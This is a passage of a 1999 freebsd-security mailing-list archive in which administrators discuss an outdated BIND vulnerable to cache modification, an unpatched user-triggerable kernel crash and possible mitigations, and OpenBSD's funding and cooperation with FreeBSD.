your channel if you don't like the long mushy ones ;-> It's time to summarize because I'm satisfied. There are different opinions for different reasons and that is to be expected. It was human nature for me to react to the unknown, percieved as threat. My original post was simple if somewhat knee-jerk. >On Wed, 11 Aug 1999 12:58:51 -0500, I wrote: >This may be old stuff but is anyone getting dns mods fromtzo.com >hijacking ip addresses to their domains? > >What do we do about it? > >see www.tzo.com > >They're about to be cut off at the FW >TIA Turns out the danger was there, not because TZO presented one though. I had simply sat on an ancient BIND wayyyy too long. Thanks to "Mitch Vincent" who hit the nail on the head.=20 --Date: Thu, 12 Aug 1999 08:40:28 -0400 --Older versions of BIND allow for cache modification remotely, that --might be what you're running into, you better upgrade, there are --other serious security holes in those versions too. ---Mitch Mitch looked at it like me as a potential problem but Mitch, in a mature manner eschewed emotional or selfish conversation. Some folks acted like I am an idiot (at least a debatable concept, heh) by being concerned about a legitimate entity that provides a legitimate service within the Internet framework, read "TZO was resourceful" as well as harmless. I then focused back on the symptoms with a later post. >Anybody had problems with Sendmail anti spam, fwd/reverse DNS >mismatches? I *think* that was what we saw.=20 Mitch however, had this covered in the BIND problem. We've brought BIND, sendmail, Apache, and some other stuff into the present as a result of this thread, thanks to all. OTOH, there were folks like myself who regarded this as manipulation of my DNS and IP space. I still feel funny that someone could *modify* my configuration at least in the eyes of other DNS servers on the 'Net. Not having total control is also human nature, I'll get over it. --------------- Since 1994 I've enjoyed Michael Dillon's posts right here at inet-access among other places. This belongs (if not already stated) in Boardwatch for ISP exposure. Please note that if you ban servers then you are banning anything that works like a telephone set. A telephone hogs the line 24 hours a day but uses no bandwidth unless a call is in progress. But because it *IS* hogging that line, the telephone is able to ring and announce an incoming call. With convergence of the Internet and telephony services, any ISP who has not structured their business to deal with always-on services will be at a disadvantage. So don't ban servers because that is a sleazy way of sidestepping the issue and users will hate you for it. Let them run all the servers they want as long as they understand that they will pay excess charges for being online too long or using too much bandwidth. Rig your systems so that users can opt for being cut off by the system rather than incurring excess charges. Basically, keep your customers happy, give them what they want, and charge a fee that covers your costs and makes you a profit. Views like this, backing up into the shotgun formation so you can see the field and responding quickly, is what keeps independent ISPs in business whilst the big boys hammer away with their inherent strength *and* weaknesses. -- =46inally, what sealed it for me was a message from Eric McIntyre: =46rom: "Ericm" Date: Tue, 17 Aug 1999 14:44:38 -0400 >If you are unhappy that your users are using our service, you should = place >something about dynamic dns in your terms of service agreement. =20 Agreed, I had to learn more about you. >The >newsgroups are not the place to complain about us, you should complain = to >your users that are abusing your service. If you offer either static IP >addresses at low prices, or offered dynamic dns options to them, they >wouldn't need our services. OK, this ain't a newsgroup is it? We're all mature ISPs, right? I had a problem to solve. I had to do like the dogs and "bow-up" until we sniffed each other's butts. As I said defense from the unknown is the human response. Several responses thought I was lame in my thoughts that you were a threat. Others saw it like I did... another hurdle to overcome. I have thought in the past about the third level, like customer.tgn.net I'm still looking at your stuff. From what I understand this now it looks like your methods may work for me too. I'll continue to read your information to see how you operate. I may be a customer or affiliate of yours too. >We have no control over the content or the terms of service agreements = that >the users sign. They choose our services because they typically have a = need >that their ISP will not help them with. I didn't ecalate or feed the AUP fight. I had old BIND seems to be the core of my problem. I am pretty liberal with my hours. I posted a mushy response to Michael Dillon that talks a little about this. >thanks Thanks to you, I may be in touch after I get a chance to resurface for air. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Philosophical summary: ...back up from the shotgun formation, into the stands where you see it's just a game, you paid to get in, and we're just here for a good time I hope our team ISPs and other independents win. When it's all over (Y2k, heh) we all go home and get on with life. Overall, I was pleased to see this thread turn into the epitome of what the old Internet was about. I was concerned, asked a question to the vast unpaid research department, and got many answers.=20 Distilling that info I came about my decision. Mine was different from other readers for different reasons. Different folks cvome and go reading the same words and go away with different ideas. I pray that never changes. I got on "da 'Net" rather late in 1994 but appreciate and admire the way the 'Net was and *how* it was built and by whom. These days, though we seem to be paranoid from all angles. Black hat hackers are more numerous, we now have to watch for commercial threats ( big boys and less than moral or ethical opportunists), legal potholes (and black holes) all around the "Information Superhighway", and finally the government is redefining history... again. (lest anarchy get a good name I guess) =46or the latter though, I realize in this case changing history <"doublespeak" -- Orwell> was just campaign loose-lip. I found this cute: Al Gore's claim to creating the Internet is still creating some zingers from Republicans. The latest is from Dan Quayle making light of his potato misspelling - "If Al Gore created the Internet, then I invented the spell-check."=20 -- http://www.swickey.com/archive/3-16-99.html peace ____________________________________________________________ Michael Butler, Texas GulfNet, | www.tgn.net =20 908 South Brooks, PO Box 2089 |=20 Brazoria, TX 77422-2089 | Voice 409-798-NETT Part of the Pointecom International| FAX 409-798-6398 =20 Network and the Global Internet | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 17:16: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 72E9B14E11 for ; Tue, 17 Aug 1999 17:15:53 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id UAA01817; Tue, 17 Aug 1999 20:16:23 -0400 (EDT) Message-Id: <4.1.19990817202758.0513f630@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 17 Aug 1999 20:28:47 -0400 To: Matthew Dillon From: Mike Tancsa Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199908171736.KAA18291@apollo.backplane.com> References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <3.0.5.32.19990817131742.02a5f6c0@staff.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:36 PM 8/17/99 , Matthew Dillon wrote: > There have been proposals to extend the concept of per-user resources > (for example, maxproc is a per-user resource). This way you would be > able to set reasonable overall limits for the user that do not overly > restrict the per-process limits. However, nobody has attempted to > actually code the idea. It seems to me a fairly easy thing to do through > the use of the credential's cache (but I'm not volunteering). > > -Matt Do any of the existing UNIX variants out there have this level of granularity? ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 17:24:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 024FA15677 for ; Tue, 17 Aug 1999 17:24:07 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id SAA02744; Tue, 17 Aug 1999 18:24:28 -0600 (MDT) Message-Id: <4.2.0.58.19990817182156.0463ecd0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Tue, 17 Aug 1999 18:23:25 -0600 To: Matthew Dillon , Mike Tancsa From: Brett Glass Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199908170527.WAA13380@apollo.backplane.com> References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:27 PM 8/16/99 -0700, Matthew Dillon wrote: > There are many ways a user can crash the system... eating network mbufs > isn't the easiest. My experience is that as long as you cover most of > the bases, the few that remain will not cause enough of a problem to > become endemic. Crashing a machine through a user account is not > really satisfactory to most hackers since it is so easy to do -- and > also relatively easy to trace. Perhaps. But this is no excuse for leaving such a serious hole open! No unprivileged user should be able to crash the system under any circumstances. Especially not this easily. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 17:27: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id F18D914EAA for ; Tue, 17 Aug 1999 17:26:56 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id SAA02765; Tue, 17 Aug 1999 18:25:56 -0600 (MDT) Message-Id: <4.2.0.58.19990817182449.0463c590@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Tue, 17 Aug 1999 18:25:23 -0600 To: Mike Tancsa , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Any work around for this FreeBSD bug/DoS ? In-Reply-To: <4.1.19990816203409.05989960@granite.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does it crash OpenBSD? Theo'd want to know. --Brett At 08:40 PM 8/16/99 -0400, Mike Tancsa wrote: >Is there any work around or coming fix for the 'testsockbuf.c' originally >reported by Marc Olzheim on Aug 9th ? Its only a matter >of time until some wannabe script kiddie uploads it to one of my servers >for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I >sent a message to the security officer last week but havent heard anything >since then. > > ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 17:32:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id C8EF3156FB for ; Tue, 17 Aug 1999 17:32:20 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id RAA40827; Tue, 17 Aug 1999 17:31:18 -0700 (PDT) (envelope-from dillon) Date: Tue, 17 Aug 1999 17:31:18 -0700 (PDT) From: Matthew Dillon Message-Id: <199908180031.RAA40827@apollo.backplane.com> To: Brett Glass Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Any work around for this FreeBSD bug/DoS ? References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <4.2.0.58.19990817182156.0463ecd0@localhost> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : :Perhaps. But this is no excuse for leaving such a serious hole open! No :unprivileged user should be able to crash the system under any circumstances. :Especially not this easily. : :--Brett I agree, but being a freeware project someone has to decide to fix it. I've got my hands full with VM (and not having commit privs already makes that difficult enough). -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 17:36:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from flycatcher.blackberry.net (flycatcher.blackberry.net [206.51.26.32]) by hub.freebsd.org (Postfix) with ESMTP id 49B7415829 for ; Tue, 17 Aug 1999 17:36:29 -0700 (PDT) (envelope-from mdtancsa@wireless.sentex.ca) Received: from ISPserver.blackberry.net (ISPserver.blackberry.net [192.168.200.80]) by flycatcher.blackberry.net (8.8.7/8.8.7) with ESMTP id UAA18040; Tue, 17 Aug 1999 20:37:00 -0400 Received: from ISPserver.blackberry.net (ISPserver.blackberry.net [192.168.200.80]) by ISPserver.blackberry.net (8.9.3/8.9.3) with SMTP id UAA28294; Tue, 17 Aug 1999 20:36:59 -0400 Message-Id: <199908180036.UAA28294@ISPserver.blackberry.net> Reply-To: Mike Tancsa To: brett@lariat.org To: mike@sentex.net To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Date: Tue, 17 Aug 1999 20:35:59 -0400 Subject: Re: Any work around for this FreeBSD bug/DoS ? Content-type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No idea. Anyone know about NetBSD ? If its purely a resource starvation issue I am curious as to why it does not crash LINUX. However that is just a report I have not verified myself. ---Mike -----Original Message----- Subject: Re: Any work around for this FreeBSD bug/DoS ? From: Brett Glass Date: Tue, 17 Aug 1999 20:25:23 -0400 To: Mike Tancsa ;freebsd-security@FreeBSD.ORG Does it crash OpenBSD? Theo'd want to know. --Brett At 08:40 PM 8/16/99 -0400, Mike Tancsa wrote: >Is there any work around or coming fix for the 'testsockbuf.c' originally >reported by Marc Olzheim on Aug 9th ? Its only a matter >of time until some wannabe script kiddie uploads it to one of my servers >for his/her cgi-script. It crashes 2.2.x and 3.x servers reliably :-( I >sent a message to the security officer last week but havent heard anything >since then. > > ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 18:21: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 6940D14C59 for ; Tue, 17 Aug 1999 18:20:57 -0700 (PDT) (envelope-from mike@sentex.net) Received: from gravel (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA13335; Tue, 17 Aug 1999 21:18:32 -0400 (EDT) Message-Id: <4.1.19990817212048.0526b150@granite.sentex.ca> X-Sender: mdtancsa@granite.sentex.ca X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 17 Aug 1999 21:30:56 -0400 To: Barrett Richardson From: Mike Tancsa Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: freebsd-security@freebsd.org In-Reply-To: References: <4.1.19990816203409.05989960@granite.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >I've been using a mechanism that prevents the running the arbitrary >executables on my systems. I require a flag bit to be set for an >executable to be run -- so if script kiddie uploads or creates >a binary executable it wont run, unless I approve it by setting the >flag. At the moment I let shell scripts slide which will leave you >vunerable to perl -- but that could be easily changed. Interesting concept, but I guess it would get only the dumbest script kiddies. Also, more and more exploits seem to be released on perl to make them 'cross platform compatible'. ---Mike ********************************************************************** Mike Tancsa, Network Admin * mike@sentex.net Sentex Communications Corp, * http://www.sentex.net/mike Cambridge, Ontario * 01.519.651.3400 Canada * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 18:33:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1752814F3A for ; Tue, 17 Aug 1999 18:33:15 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id VAA15876; Tue, 17 Aug 1999 21:32:14 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: geniusj@phoenix.unacom.com (The Tech-Admin Dude) Cc: security@freebsd.org Subject: Re: misc/13202: Easy for user to crash system Date: Wed, 18 Aug 1999 01:44:40 GMT Message-ID: <37ba0f4a.79631664@mail.sentex.net> References: In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 17 Aug 1999 13:35:17 -0400, in sentex.lists.freebsd.bugs you wrote: >The following reply was made to PR misc/13202; it has been noted by GNATS. > >From: The Tech-Admin Dude >To: slawson@alphamicro.com >Cc: freebsd-gnats-submit@freebsd.org >Subject: Re: misc/13202: Easy for user to crash system >Date: Tue, 17 Aug 1999 21:17:15 -0400 (EDT) > > I recommend using login accounting, that is what it is there for :).. > /etc/login.conf.. How much swap was there? What was MAXUSERS set to? > normally, for an ls, if you have maxusers at default, i'm surprised you > didnt run out of processes before it crashed, must have low swap? Anyway, > main point, USE LOGIN ACCOUNTING :) Is there a rough rule of thumb as to how much overhead login accounting takes on a system ? Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada "Who is this 'BSD', and why should we free him?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 19:52:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from topsecret.net (gill.apk.net [207.54.148.62]) by hub.freebsd.org (Postfix) with SMTP id 3318714DC4 for ; Tue, 17 Aug 1999 19:52:42 -0700 (PDT) (envelope-from gill@topsecret.net) Received: from stumpy by topsecret.net with SMTP (MDaemon.v2.7.SP5.R) for ; Fri, 13 Aug 1999 00:53:55 -0400 From: "James Gill" To: Subject: OpenBSD Date: Fri, 13 Aug 1999 00:53:37 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal X-MDaemon-Deliver-To: freebsd-security@freebsd.org X-Return-Path: gill@topsecret.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As a result of this conversation, I found myself once again cruising the OpenBSD website and noticed a particularly disturbing paragraph at the bottom of the front page at http://www.openbsd.org/goals.html: "Theo de Raadt has spent more than $30,000 (CDN) to make OpenBSD run so far, mostly due to expensive networking costs in Canada and such (due to USA crypto policies, it is not possible to move the project to the USA). No funding or cost-sharing of the project comes from any company or educational institution. As well, Theo works full-time on improving OpenBSD. Additional funding is urgently needed at all times, in fact a nice sponsorship or two would go a long ways towards ensuring that OpenBSD continues to exist. Currently the project is in grave danger. Please do not take this above statement too lightly, since the project is typically not in strong financial health. " I dunno, perhaps this is an opportune time to try to coordinate the projects? --gill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 21:56: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 663C414D05 for ; Tue, 17 Aug 1999 21:55:58 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.9.3/8.9.3) with ESMTP id AAA10764; Wed, 18 Aug 1999 00:56:01 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: References: Date: Wed, 18 Aug 1999 00:56:20 -0400 To: "James Gill" , From: Garance A Drosihn Subject: Re: OpenBSD Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:53 AM -0400 8/13/99, James Gill wrote: >I dunno, perhaps this is an opportune time to try to coordinate the >projects? It is always a good time to coordinate them. The trick is in actually doing the coordination... :-) I assume you're suggesting that the freebsd project pay the openbsd project some amount such that the openbsd project (outside the USA) could maintain some security-related pieces meant for FreeBSD, and thus avoid the US export-control issues? I don't know how well that would work. If it's workable, it might be advantageous for both projects. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 22:21:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id DA91F14D8B for ; Tue, 17 Aug 1999 22:21:42 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA04969; Tue, 17 Aug 1999 23:21:50 -0600 (MDT) Message-Id: <4.2.0.58.19990817231823.0464ba90@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Tue, 17 Aug 1999 23:20:50 -0600 To: Mike Tancsa , Matthew Dillon From: Brett Glass Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <4.1.19990817202758.0513f630@granite.sentex.ca> References: <199908171736.KAA18291@apollo.backplane.com> <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <3.0.5.32.19990817131742.02a5f6c0@staff.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 08:28 PM 8/17/99 -0400, Mike Tancsa wrote: >Do any of the existing UNIX variants out there have this level of granularity? It's possible to set an automatically calculated limit based on other parameters, and to reserve some emergency space for the kernel and vital processes (the "banker's algorithm"). So, one doesn't HAVE to add infinitet granularity to guard against resource starvation. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 22:21:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id E0E9314F31 for ; Tue, 17 Aug 1999 22:21:42 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA04964; Tue, 17 Aug 1999 23:21:47 -0600 (MDT) Message-Id: <4.2.0.58.19990817231641.04640280@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Tue, 17 Aug 1999 23:18:00 -0600 To: Matthew Dillon From: Brett Glass Subject: Re: Any work around for this FreeBSD bug/DoS ? Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG In-Reply-To: <199908180031.RAA40827@apollo.backplane.com> References: <4.1.19990816203409.05989960@granite.sentex.ca> <4.1.19990816213403.05a3b540@granite.sentex.ca> <4.2.0.58.19990817182156.0463ecd0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, who's a kernel memory allocation expert? I would dive on this one, but I'd be coming in cold; I've never messed with that part of the kernel at all. All I know about mbuf allocation is what's in McKusick. --Brett At 05:31 PM 8/17/99 -0700, Matthew Dillon wrote: >: >:Perhaps. But this is no excuse for leaving such a serious hole open! No >:unprivileged user should be able to crash the system under any circumstances. >:Especially not this easily. >: >:--Brett > > I agree, but being a freeware project someone has to decide to fix it. > I've got my hands full with VM (and not having commit privs already makes > that difficult enough). > > -Matt > Matthew Dillon > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 22:27:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from nexus.plymovent.se (nexus.plymovent.se [212.247.77.253]) by hub.freebsd.org (Postfix) with ESMTP id C955E14D1F for ; Tue, 17 Aug 1999 22:27:43 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from tu ([192.168.1.21]) by nexus.plymovent.se (8.9.3/8.9.3) with SMTP id HAA03432; Wed, 18 Aug 1999 07:34:28 +0200 (CEST) (envelope-from thomas.uhrfelt@plymovent.se) From: "Thomas Uhrfelt" To: "James Gill" Cc: Subject: RE: OpenBSD Date: Wed, 18 Aug 1999 07:25:46 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Please do not take this above statement too lightly, since the project > is typically not in strong financial health. " > > > I dunno, perhaps this is an opportune time to try to coordinate the > projects? > > --gill I for one would love to see the talented programmers/designers of OpenBSD merge in their excellent features into FreeBSD and join our happy familiy. Regards, Thomas Uhrfelt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 22:46: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 3213D14CC3 for ; Tue, 17 Aug 1999 22:45:59 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA05191; Tue, 17 Aug 1999 23:44:33 -0600 (MDT) Message-Id: <4.2.0.58.19990817234258.0479b3b0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Tue, 17 Aug 1999 23:44:29 -0600 To: "Thomas Uhrfelt" , "James Gill" From: Brett Glass Subject: RE: OpenBSD Cc: In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 07:25 AM 8/18/99 +0200, Thomas Uhrfelt wrote: >I for one would love to see the talented programmers/designers of OpenBSD >merge in their excellent features into FreeBSD and join our happy familiy. One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained on quite a few CPUs and machine architectures. Would FreeBSD be willing to go that route? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 23: 0:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3a123.neo.rr.com [24.93.180.123]) by hub.freebsd.org (Postfix) with ESMTP id ECC0614A0B for ; Tue, 17 Aug 1999 23:00:19 -0700 (PDT) (envelope-from mike@argos.org) Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA19402; Wed, 18 Aug 1999 01:58:02 -0400 Date: Wed, 18 Aug 1999 01:58:02 -0400 (EDT) From: Mike Nowlin To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: RE: OpenBSD In-Reply-To: <4.2.0.58.19990817234258.0479b3b0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > One snag, though: OpenBSD, like NetBSD, is cross-platform and is maintained > on quite a few CPUs and machine architectures. Would FreeBSD be willing to > go that route? I'd sure hope so... Let's face it -- even though FreeBSD is (in my opinion) the most "robust" out of the bunch, the x86 architecture isn't going to win any awards for performance.... Cheap, yes. Easy, yes. Works for the most part, yes. But it's still based off of the idea that we need to be backwards-compatible with the late 1700's. The Alpha port of FBSD is A Good Thing (I'm hoping to try it out this weekend on a couple of the Alpha machines I have available for playing with), but the high-end boxes are pretty pricey. You can find multi-processor SPARC machines being practically given away by companies who don't know what they're capable of, not to mention several other platforms. If the code bits are merged together properly (key word), maintaining a multiple-architecture source tree shouldn't be that difficult -- just make sure the machine-dependant parts all end up with the same ways of doing things... After all -- if Microsloth can do it with NT...... :) --mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Aug 17 23: 6:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from nexus.plymovent.se (nexus.plymovent.se [212.247.77.253]) by hub.freebsd.org (Postfix) with ESMTP id 09AF814A0B for ; Tue, 17 Aug 1999 23:06:15 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se) Received: from tu ([192.168.1.21]) by nexus.plymovent.se (8.9.3/8.9.3) with SMTP id IAA03706; Wed, 18 Aug 1999 08:13:23 +0200 (CEST) (envelope-from thomas.uhrfelt@plymovent.se) From: "Thomas Uhrfelt" To: "Brett Glass" Cc: Subject: RE: OpenBSD Date: Wed, 18 Aug 1999 08:04:40 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <4.2.0.58.19990817234258.0479b3b0@localhost> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > One snag, though: OpenBSD, like NetBSD, is cross-platform and is > maintained > on quite a few CPUs and machine architectures. Would FreeBSD be willing to > go that route? I can see this is going to be tricky. But I am sure it all would work out for the best if we try. Regards, Thomas Uhrfelt To Unsubscribe: send mail to majordomo@FreeBSD.org with 